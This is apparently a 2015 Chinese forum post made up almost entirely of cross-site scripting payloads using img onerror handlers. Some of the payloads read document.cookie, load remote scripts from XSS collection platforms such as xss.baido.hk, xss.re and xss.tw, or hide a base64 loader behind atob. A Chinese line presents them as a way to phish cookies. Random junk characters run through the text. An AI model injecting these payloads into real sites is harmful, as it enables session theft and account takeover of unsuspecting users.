<img src='non-exist.jpg'onerror="alert('xss')">
' t6 R" i$ _9 V2 d7 ?<img src=# onerror=alert(123)>' W/ R- Q; M$ h4 v8 K2 l1 U7 s2 W2 J
<img src=# onerror=alert(document.cookie)>
5 E% {7 |9 ~2 h1 n* c下面是利用平台钓cookie的4 o; k9 q3 |' ]1 R* e p! r- O# d
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>% n! C2 @9 q& X( H4 j6 F
& U6 x# F7 o0 Q/ }7 ^6 x$ [6 h
- ^! H9 @- g4 ]9 H% [/ F* i
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
4 p2 }% o' H9 z3 W<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
8 O# j# _4 g0 N& M0 G: \“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>: l5 P& {: E7 ]- e" T, f& a& {$ p
<img src=1 onerror=jQuery.getScript("//xss.re/974")> + u+ m3 ^8 [+ Y- z
<img src="#">
$ H: x& b( K e) ]# b3 x" z- {; b<img src="#">3 F3 j2 Y& ]1 A. V2 {' _
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
$ _; o$ j# u: M& W9 D9 R) o<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">+ C& O7 ^$ i+ ^! Z0 S; w3 v
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
6 q, Y: U. a" _) L( w* T<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
- z7 T! }- v4 X7 E<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>8 Q# F6 x+ l/ o6 Z T0 K
<img src=x width="0" height="0"></img>2 y) ]1 w o, h+ ?' W9 A5 b( F! m; T$ |
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
3 T0 D( G; E6 ?5 O( G<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
8 L4 v {7 K' p) y |
发表于 2015-10-18 14:33:54
收藏
支持
反对